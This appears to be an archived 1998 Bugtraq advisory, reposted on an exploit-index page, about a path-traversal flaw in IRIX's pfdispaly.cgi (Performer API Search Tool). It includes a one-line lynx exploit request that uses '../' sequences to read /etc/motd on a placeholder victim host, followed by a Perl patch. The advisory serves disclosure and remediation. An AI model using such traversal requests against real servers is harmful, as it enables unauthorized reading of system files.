Irix pfdispaly CGI hole

Summary
Description:Standard .. read-any-file CGI exploit.
Author:"J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Compromise:Read any file (remotely) that user nobody (or whatever web server runs as) can read.
Vulnerable Systems:IRIX 6.2 with performer_tools.sw.webtools (Performer API Search Tool 2.2) installed, check for /var/www/cgi-bin/pfdispaly.cgi.
Date:17 March 1998
Details


Date: Tue, 17 Mar 1998 00:06:48 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: IRIX performer_tools bug

    Do you remember the /cgi-bin/handler bug?

    Well, more of the same:

    Software:
    IRIX 6.2
    performer_tools.sw.webtools (Performer API Search Tool 2.2)
    /var/www/cgi-bin/pfdispaly.cgi

    Bug: Anyone can read files (as 'nobody') from your system:

    Exploit:

    lynx -source \
    'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    for instance :-)


    Fix:

*** pfdispaly.cgi.O     Mon Mar 16 23:13:34 1998
--- pfdispaly.cgi       Mon Mar 16 23:36:29 1998
***************
*** 14,19 ****
--- 14,20 ----
  $fullcgiroot = "/var/www$cgiroot";

  $shortfilepath = "$ARGV[0]";
+ $shortfilepath =~ s/\.{2,}//g;
  $fullfilepath = "$maindocroot$shortfilepath";
  ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;



    Note: I haven't tested the other Performer CGI's too much,
    maybe they will have more nasty bugs.
    (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
    prepended; but somewhere 'dangerous' characters are escaped)

    There is another bug at pfsearch.cgi; which lacks of
    a
    print "Content-type: text/html\n\n";
    line, so you get garbage in your browser.

    (and even worse, you have to enable JavaScript if you want
    to use this set of CGIs...)


--
    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]